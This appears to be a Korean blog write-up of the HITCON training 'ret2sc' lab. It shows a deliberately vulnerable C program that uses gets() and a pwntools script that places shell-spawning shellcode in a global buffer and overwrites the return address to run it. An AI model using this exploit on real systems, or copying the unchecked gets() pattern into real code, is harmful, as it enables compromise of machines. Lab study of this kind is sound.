ret2sc.c
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
#include <stdio.h>
char name[50];
int main(){
setvbuf(stdout,0,2,0);
printf("Name:");
read(0,name,50);
char buf[20];
printf("Try your best:");
gets(buf);
return ;
}
http://colorscripter.com/info#e" target="_blank" style="color:#4f4f4f; text-decoration:none">Colored by Color Scripter
|
보호기법 확인
slv.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
from pwn import *
# name_Addr
ret = 0x804a040
p = process('./ret2sc')
# architecture setting
context(arch='i386', os='linux')
p.recvuntil(':')
# sehllcraft로 shellcode send
p.sendline(asm(shellcraft.sh()))
p.recvuntil(':')
# Dummy + SFP + RET(name_Addr)
p.send('a'*0x1c + "bbbb" + p32(ret))
p.interactive()
http://colorscripter.com/info#e" target="_blank" style="color:#4f4f4f; text-decoration:none">Colored by Color Scripter
|
Exploit Flow
1. name 전역변수 위치 확인
2. name에 shellcode 보내기
3. RET주소 name_Addr로 설정
4. exploit.
'System > Hitcon training' 카테고리의 다른 글
| 190403-lab6 (0) | 2019.04.03 |
|---|---|
| 190403-lab5 (0) | 2019.04.03 |
| 190403-lab4 (0) | 2019.04.03 |
| 190403-lab2 (0) | 2019.04.03 |
| 190403-lab1 (0) | 2019.04.03 |